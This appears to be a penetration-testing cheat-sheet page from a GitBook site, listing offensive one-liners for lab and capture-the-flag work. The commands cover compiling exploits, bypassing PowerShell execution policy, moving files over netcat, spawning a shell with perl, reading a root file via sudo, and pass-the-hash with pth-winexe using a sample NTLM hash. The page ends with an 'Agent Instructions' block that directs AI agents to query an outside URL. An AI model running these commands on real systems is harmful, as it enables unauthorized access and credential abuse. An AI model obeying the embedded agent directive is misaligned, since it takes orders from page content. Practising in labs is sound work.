# MISC

Compiling Exploits

```
gcc -o exploit exploit.c
#Compile C code, add –m32 after ‘gcc’ for compiling 32 bit code on 64 bit Linux
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

Cross compiling
Compile Windows exploit in Linux
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe

Compile Python script to executable
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py
```

Packet Inspection

```
tcpdump tcp port 80 -w output.pcap -i eth0

```

Powershell bypass

```
Powershell: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1

```

Window Exploit Suggester

```
 ./windows-exploit-suggester.py -d 2019-07-20-mssb.xls -i system.txt
```

Finding Auxiliary

```
 ls /usr/share/nmap/scripts/ | grep smb | grep vuln

```

Netcat

```
From attacker to target
At target
nc -lvp 6969 > blah.txt
At attacker (method 1)
nc x.x.x.x 6969 < blah.txt
At attacker (method 2)
cat blah.txt | nc x.x.x.x 6969
```

Perl Exploit

```
Perl Exploit
perl —e 'exec "/bin/sh";'
sudo perl -F: -lane 'print $F[0]' /root/root.txt
```

Awk

```
Remove duplicate lines:
awk '!seen[$0]++' file
```

Searchsploit

```
searchsploit --overflow --exact --mirror 21234

 searchsploit --overflow --exact Gwolle
```

Firewall Rule Enable

```
firewall rule enable
ufw allow from victimip to any port 80,443 proto tcp

```

Wordlist Creation

```
Wordlist creation:
cewl -w cewl-forum.txt -e -a http://forum.bart.htb
```

PASS the HASH

```

Pass the hash :
pth-winexe -U jenkins/administrator //ip cmd.exe
pth-winexe -U jenkins/administrator%password //ip cmd.exe
crackmapexec

 pth-winexe --user=jeeves/administrator%aad3b435b51404e eaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe

```

Share folder Windows to linux

mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow\_other


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infosecsanyam261.gitbook.io/tryharder/misc.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.